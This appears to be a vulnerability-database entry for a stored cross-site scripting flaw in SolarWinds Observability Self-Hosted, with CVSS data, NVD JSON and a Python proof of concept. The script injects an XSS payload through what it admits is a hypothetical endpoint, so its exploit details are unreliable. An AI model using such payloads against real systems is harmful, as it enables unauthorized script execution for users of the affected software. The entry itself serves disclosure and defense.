Security Vulnerability Report
中文
CVE-2026-28297 CVSS 6.1 MEDIUM

CVE-2026-28297

Published: 2026-03-26 15:16:35
Last Modified: 2026-03-31 14:14:02

Description

SolarWinds Observability Self-Hosted was found to be affected by a stored cross-site scripting vulnerability, which when exploited, can lead to unintended script execution.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:solarwinds:observability_self-hosted:*:*:*:*:*:*:*:* - VULNERABLE
SolarWinds Observability Self-Hosted (具体版本请参考官方2026-1-1发布说明及之前版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # This is a generic PoC simulation for Stored XSS # Target URL (Hypothetical endpoint based on vulnerability type) target_url = "https://target-solarwinds/api/endpoint" login_url = "https://target-solarwinds/api/login" # Malicious payload to demonstrate script execution # Use a simple alert or callback for verification xss_payload = "<img src=x onerror=alert('CVE-2026-28297-Test')>" # Authenticate with High Privilege Account (PR:H required) session = requests.Session() credentials = {"username": "admin", "password": "high_priv_pass"} session.post(login_url, data=credentials) # Inject the payload via a vulnerable input field headers = {"Content-Type": "application/json"} data = { "configuration_name": "Test Config", "description": xss_payload # Injecting payload into a persistent field } response = session.post(target_url, json=data, headers=headers) if response.status_code == 200: print("Payload injected successfully.") print("Trigger: Navigate to the page that displays the 'description' field.") else: print(f"Injection failed with status code: {response.status_code}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-28297", "sourceIdentifier": "[email protected]", "published": "2026-03-26T15:16:34.520", "lastModified": "2026-03-31T14:14:02.453", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SolarWinds Observability Self-Hosted was found to be affected by a stored cross-site scripting vulnerability, which when exploited, can lead to unintended script execution."}, {"lang": "es", "value": "SolarWinds Observability Self-Hosted se encontró que estaba afectado por una vulnerabilidad de cross-site scripting almacenado, la cual, al ser explotada, puede llevar a la ejecución de scripts no deseados."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.9, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 5.8}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:solarwinds:observability_self-hosted:*:*:*:*:*:*:*:*", "versionEndExcluding": "2026.1.1", "matchCriteriaId": "84D4A29F-B25B-42BD-A817-D40717B25EF6"}]}]}], "references": [{"url": "https://documentation.solarwinds.com/en/success_center/orionplatform/content/release_notes/hco_2026-1-1_release_notes.htm", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.solarwinds.com/trust-center/security-advisories/CVE-2026-28297", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}